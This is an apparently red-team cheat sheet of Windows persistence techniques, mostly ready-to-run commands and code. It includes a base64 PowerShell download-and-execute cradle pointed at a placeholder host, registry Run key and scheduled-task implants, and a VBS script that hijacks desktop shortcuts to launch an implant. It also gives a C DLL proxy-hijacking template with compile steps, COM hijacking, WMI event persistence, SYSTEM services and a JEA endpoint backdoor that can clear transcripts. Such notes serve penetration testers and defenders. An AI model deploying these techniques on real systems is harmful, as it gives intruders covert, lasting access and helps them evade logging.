Its important to implement a control mechanism in the payloads to stop multiple executions via for example mutex, file, event or something similar
Persistence methods for low privilege persistence
Copy payload to startup folder copy <PATH TO EXE> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
For cleanup delete the file again
str='IEX ((new-object net.webclient).downloadstring("http://x.x.x.x/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64>" -f "UserEnvSetup" -m add
Run applications on boot
There are more keys, read Mitre
Can use HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d <PATH TO EXE> /f
Cleanup reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
Launch programs or set folder items HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
-k is the registry key to modify.-v is the name of the registry key to create.
SharPersist.exe -t reg -c "<PATH TO EXE>" -a "/q /n" -k "hkcurun" -v "MSUpdate" -m add
Create, Query and run task schtasks /create /tn "MSUpdate" /sc daily /st 10:00 /tr "<PATH TO EXE>"
schtasks /query /tn "MSUpdate" /fo:list /v
schtasks /run /tn "MSUpdate"
Create task the user session is idle for 10 minutes schtasks /create /tn "MSUpdate" /tr "<PATH TO EXE>" /sc onidle /i 10
schtasks /query /tn "MSUpdate" /fo:list /v
schtasks /run /tn "MSUpdate"
Script will run on logon of a user. Might not run instantly because of logon script startup delay.
reg query "HKEY_CURRENT_USER\Environment"
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "<PATH TO BAT FILE>" /t REG_SZ /f
Cleanup reg delete "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript
Modify shortcuts from programs that are frequently used.
Run the following VBS script
Preserves the original functionality. Will replace link with newTarget which will run the implant and then the orginal program
Run it with wscript <SCRIPT>
' CONFIGURATION
implant = "C:\implant.exe"
newTarget = "C:\putty.vbs"
lnkName = "putty.exe.lnk"
' helper vars
set WshShell = WScript.CreateObject("WScript.Shell" )
strDesktop = WshShell.SpecialFolders("Desktop" )
set oShellLink = WshShell.CreateShortcut(strDesktop & "\" & lnkName )
origTarget = oShellLink.TargetPath
origArgs = oShellLink.Arguments
origIcon = oShellLink.IconLocation
origDir = oShellLink.WorkingDirectory
' persistence implantation
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(newTarget,True)
File.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLf
File.Write "oShell.Run " & chr(34) & implant & chr(34) & vbCrLf
File.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLf
File.Close
oShellLink.TargetPath = newTarget
oShellLink.IconLocation = origTarget & ", 0"
oShellLink.WorkingDirectory = origDir
oShellLink.WindowStyle = 7
oShellLink.Save
Might not work if screensaver is already set over GPO
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "<PATH TO EXE>" /f
removal:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "" /f
Query and change screensave timeout reg query "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut"
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
Cleanup reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "" /f
Only works when PowerShell is started on the machine. Will work for example if a logonscript is run with PowerShell
dir %HOMEPATH%\Documents\windowspowershell\
Create WindowPowerShell directory mkdir %HOMEPATH%\Documents\windowspowershell\
echo <PATH TO EXE> > "%HOMEPATH%"\Documents\windowspowershell\profile.ps1"
echo <PATH TO EXE> >> "%HOMEPATH%"\Documents\windowspowershell\<PROFILE>"
rem %HOMEPATH%"\Documents\windowspowershell\profile.ps1
DLL Hijacking might break the application. Creating a proxy module which will run the implant and then run the legitimate DLL.
DLL Search order for Desktop Apps:
DLL already in memory
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLsApp's directory
C:\Windows\System32 | SysWow64C:\Windows\SystemC:\Windows\Current directory
`%PATH%
Need write permissions to place DLL in the App's directory.
Download everything locally Check for DLL to proxy/hijack
Start [ProcMon](https://learn.microsoft.com/nl-nl/sysinternals/downloads/procmon
Set two filters
Result, contains, NOT FOUND, IncludeProcess Name, contains, <PROCESS/PROGRAM NAME>, Include
Start the Program
Check for DLL's which are not found.
Open process hacker and go to Modules, then check if the DLL NOT FOUND is still loaded.
The message is showing because it couldn't find it in the first path but it did in another folder
Turn off filter to check it was found.
Choosing a DLL
Check for imported DLL's with dumpbin. dumpbin /imports <PATH TO EXE>
Look for a DLL Without a lot of functions
Possible to make your own C code and injector in the Go function.
#include <Windows.h>
void Go(void) {
STARTUPINFO info={sizeof(info)};
PROCESS_INFORMATION processInfo;
CreateProcess(
"<PATH TO EXE>",
"", NULL, NULL, TRUE, 0, NULL, NULL,
&info, &processInfo);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
Go();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Add original function linkers, example. Add the ordinal number of the function from dumpbin. (Convert hex to decimal)
Where winsplhlp is a copy of the original DLL
#pragma comment(linker,"/export:OpenPrinterA=winsplhlp.OpenPrinterA,@143")
Compile
Make sure compile it to the correct architecture
cl.exe /W0 /D_USRDLL /D_WINDLL <FILE NAME>.cpp /MT /link /DLL /OUT:<OUT DLL NAME>
dumpbin /exports <OUT DLL NAME>
Copy original DLL to DLL used in linker
cp <ORIGINAL DLL>.dll <PATH TO PROGRAM>\<DLL NAME SET IN LINKER>.dll
Program might still crash if specific functions from the DLL are used that didn't show in the import table. Get all the exported functions:
dumpbin /exports <PATH TO ORIGINAL DLL>
Create linker for every function! If there are functions without names use the ordinals with the following syntact
#pragma comment(linker,"/export:NONAME=winsplhlp.#100,@100,NONAME")
COM loads from the user registry and then from the system. So looking up a reg key it loads from the system hive and adding it in the user hive will make it load that reg key first.
COM registery can be found in <HIVE>\SOFTWARE\Classes\CLSID Where <HIVE> is the HKCR, HKCU or HKLM
Query scheduled tasks. Look for something as <ComHandler> instead if the <Exec> tags and <LogonTrigger> in <Triggers>
schtasks /query /xml > tasks.xml
Query the HKCR to see which DLL and then the HKCU and HKLM to check where the reg key is set. If HKLM then its exploitable by adding a HKCU.
reg query "HKCR\CLSID\{<ID>}"
reg query "HKCR\CLSID\{<ID>}\Inprocserver32"
reg query "HKCU\SOFTWARE\Classes\CLSID\{<ID>}"
reg query "HKLM\SOFTWARE\Classes\CLSID\{<ID>}"
reg export "HKLM\SOFTWARE\Classes\CLSID\{<ID>}" tsk-orig.reg /reg:64 /y
Microsoft Office Trusted Locations
Allow DLL or macros to execute despite the configured security settings (Ignored if macro's or add-ins have been blocked by GPO)
Create a new Excel document with a module containing the persistence mechanism. Save it as "Excel Add-in" inside %APPDATA%\Microsoft\Excel\XLSTART and it will be launched every time the user opens MS Excel application.
https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/
Persistence methods for high privileged persistence
Create service running as SYSTEM, service is in a stopped state, but with the START_TYPE set to AUTO_START.
.\SharPersist.exe -t service -c "<PATH TO EXE>" -n "<SERVICE NAME>" -m add
Run task as system each time a user logs in
schtasks /create /ru "NT AUTHORITY\SYSTEM" /rp "" /tn "<TASK NAME>" /tr <PATH TO EXE> /sc onlogon
Import-Module PowerLurk.ps1
Register-MaliciousWmiEvent -EventName <EVENT NAME> -PermanentCommand "<PATH TO EXE>" -Trigger ProcessStart -ProcessName notepad.exe
If we have admin privileges on a machine, we can create a JEA endpoint which allows all commands to a user we control.
With this capability, it is also possible to clear the transcripts for this endpoint.
Create a new JEA endpoint Set-JEAPermissions -ComputerName ops-dc -SamAccountName <USER> -Verbose
Enter-PSSession -ComputerName ops-dc -ConfigurationName microsoft.powershell64